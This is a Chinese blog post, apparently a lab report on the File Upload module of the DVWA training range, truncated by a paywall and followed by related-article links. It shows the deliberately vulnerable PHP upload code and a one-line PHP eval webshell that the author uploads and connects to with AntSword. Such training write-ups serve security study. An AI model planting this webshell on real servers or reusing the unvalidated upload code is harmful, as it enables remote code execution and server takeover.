DVWA 实验报告:5、文件上传 File Upload

最新推荐文章于 2024-05-14 10:10:16 发布
最新推荐文章于 2024-05-14 10:10:16 发布
阅读量1.5k 收藏 12
点赞数 2
分类专栏: # dvwa 专栏 文章标签: 文件上传 dvwa php 代码审计 web 靶场 web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21516633/article/details/106164841
版权
本文详细记录了DVWA中不同安全等级的文件上传漏洞,从Low到Impossible,探讨了源码分析、攻击手段及防御措施。在Low级别,成功利用一句话木马实现远程连接;Medium级别通过修改文件后缀绕过限制;High级别尝试合成图片马但未成功;Impossible级别由于严格的文件检查和防护机制,攻击难以实施。
摘要由CSDN通过智能技术生成

文章更新于:2020-05-16

文件上传漏洞 File Upload

一、安全等级:Low

1.1、源码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
   
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
   
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
   
        // Yes!
        echo "<pre>{
     $target_path} succesfully uploaded!</pre>";
    }
}

?>

1.2、攻击

这时我们写一个一句话木马测试上传。

ok
<?php @eval($_POST['test']) ?>

在这里插入图片描述
我们根据提示的路径尝试访问:
在这里插入图片描述
访问成功,接下来测试是否可用。

这里使用蚁剑连接:
在这里插入图片描述
添加之后,双击数据连接成功:
在这里插入图片描述

二、安全等级:Medium

2.1、源码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
   
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded'
最低0.47元/天 解锁文章
我不是高材生
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全实验-DVWA文件漏洞上传
weixin_45431475的博客
10-29 1071
网络安全实验
【无标题】Dvwa靶场文件上传漏洞学习
m0_62636343的博客
09-03 689
Dvwa靶场文件上传漏洞学习笔记
DVWA-File Upload模块展开实验
最新发布
weixin_52363821的博客
05-14 868
"File Upload" 模块
DVWA平台文件包含漏洞实验
KUKULI233的博客
05-28 671
一、概念 包含就是浏览,但是不同的是遇见可执行语句将执行 漏洞成因是因为开发人员为使代码更灵活,将文件设为变量,调用的时候未做过滤处理,就可以包含恶意文件 是PHP语言的漏洞,实验需要先配好php服务环境,此处在win7上开启phpstudy Require:找不到被包含的文件会报错并停止 Include:报错,继续执行 _once :调用重复文件时只执行一次 url特征: ?page ?file ?home 目录遍历可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格 文件包含是利用函数包含
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4235
DVWA文件上传
DVWA实验-文件上传
Ping_Pig的博客
09-15 2420
我们来测试dvwa文件上传漏洞.我们先干,后分析代码 Low级别 我们发现上传界面是这样的 那我们按照要求来随便上传一个文件,我现在直接上传一个php文件,内容为 <?php phpinfo(); ?> 选择文件后点击上传可以发现页面有回显上传成功的提示和上传的路径 那么我们可以直接根据这个链接去访问下,看是否能够正常访问刚才上传成功的文件 上传成功,并...
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 5737
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
web安全技术-实验六、文件上传漏洞.doc
08-20
文件上传漏洞】是Web应用安全领域中的一个重要概念,它主要出现在允许用户上传文件到服务器的应用程序中。当系统没有正确地验证或过滤上传的文件类型时,攻击者可以利用这个漏洞上传恶意代码,例如病毒、木马或者...
文件上传upload-labs(一)
01-08
例如,在pass-02的示例中,检查`$_FILES['upload_file']['type']`来确认上传文件是否为合法的图片类型。此外,还应检查文件扩展名,避免通过更改文件名欺骗服务器。使用`move_uploaded_file()`函数将临时文件移动到...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
《计算机网络安全实验》实验报告1
11-01
【计算机网络安全实验】实验报告1主要探讨了DVWA(Damn Vulnerable Web Application)中的PHP与MySQL环境下的SQL注入漏洞。该实验旨在让学生理解和掌握SQL注入的原理、利用方法以及防御措施。以下是实验涉及的主要...
DVWA 实验报告:1、暴力破解
看那白熊
04-14 5383
文章更新于:2020-04-14 注1:环境搭建参见:搭建DVWA Web渗透测试靶场 注2:实验报告2参见:DVWA 实验报告:2、命令注入 DVWA之暴力破解漏洞一、前言二、安全级别:LOW2.1、查看源码2.2、尝试暴力破解三、安全级别:Medium3.1、查看源码3.2、攻击思路四、安全级别:High4.1、查看源码4.2、攻击思路五、安全级别:Impossible5.1、查看源码5.2、...
文件上传漏洞实验报告
qq_65197898的博客
03-21 4992
文件上传漏洞 一、因为刷新但是上传没消失所以这是个前端 将一个带有一句话木马的.txt文件改为可上传的文件格式 打开代理和Burp Suit软件抓包不要关拦截上传在bp中将后缀改为.php放行 右击图片复制图片链接获得位置 中国蚁剑添加进入 二、查看源码得知仅检查了类型,将类型改为图片格式这里改为(jpeg、png、gif) 三、上传得知时这是黑名单查看源码得知会过滤:$TADA所以在抓到的包中将文件名后双写$TADA进行绕过 四、查看源码得知没有禁用.hatcces...
DVWA 实验报告:7、SQL 注入 SQL Injection
看那白熊
05-17 1302
dvwa SQL注入漏洞复现
实验 FileUpload 笔记
zcq19911006的博客
07-29 349
1. 需求1.1 文件的上传1.1.1 可以上传一个或多个文件,每个文件后面附加一个desc文本域,用于上传对该文件的说明信息> 1.1.2 文件通过表单上传到服务器,服务器将文件保存到它的本地磁盘文件夹,并将其文件名改为一个随机数,以免有重名文件冲突;并将该文件的原文件名、保存在服务器上的路径(包含随机文件名) 以及对该文件的描述信息保存到数据库中1.1.3 删除临时存储在磁盘上的文件(对于上传
DVWA 实验报告:8、SQL 注入 SQL Injection(Blind)
看那白熊
05-30 714
占位
实验七 文件上传漏洞
Sum
06-02 1659
实验七 文件上传漏洞 一、原理: 一些web应用程序中允许上传图片,文本或者其他资源到指定的位置。 文件上传漏洞就是利用网页代码中的文件上传路径变量过滤不严将可执行的文件上传到一个到服务器中,再通过URL去访问以执行恶意代码。 二、检测绕过: 1、网页有javascript代码,校验上传文件的后缀名,可通过禁用js或修改后缀名饶过。 2、服务器端对文件的MIME类型校验,通过bp修改类型进行绕过。 —客户端js检测绕过 【实验目的】 绕过JavaScript验证检测,上传一句话木马。 【知识点】 Burp
文件上传渗透实验
xiongIT的博客
10-31 1457
文件上传渗透实验
DVWAFile Upload模块展开实验
06-10
好的,我可以为您提供一些关于DVWAFile Upload模块的实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供练习和学习。其中就包括File Upload模块。 以下是一些关于DVWAFile Upload模块的实验步骤: 1. 首先,您需要在本地安装DVWA,并启动它。您可以使用XAMPP等工具来安装和启动DVWA。 2. 登录到DVWA并选择File Upload模块。 3. 选择一个文件并上传。您可以尝试上传一些不同类型的文件,如图片、文本文件、PDF等。 4. 观察上传后的结果。如果上传成功,您应该能够看到一个已上传的文件列表,并且您上传的文件应该显示在列表中。 5. 试着上传一些恶意文件,如包含恶意代码的文件。观察上传后的结果并尝试分析它们的影响。 6. 尝试绕过文件上传的限制。您可以尝试通过修改文件扩展名、使用特殊字符或修改HTTP报文来绕过文件类型和大小的限制。 7. 尝试利用文件上传漏洞进行攻击。您可以尝试上传一个包含Web Shell的文件,并尝试通过Web Shell来获取系统权限。 需要注意的是,您在进行实验时应该遵循合法的道德和法律标准,不得以任何非法或不道德的方式使用这些技术。同时,您应该在安全的环境中进行实验,以避免对其他人或组织的系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值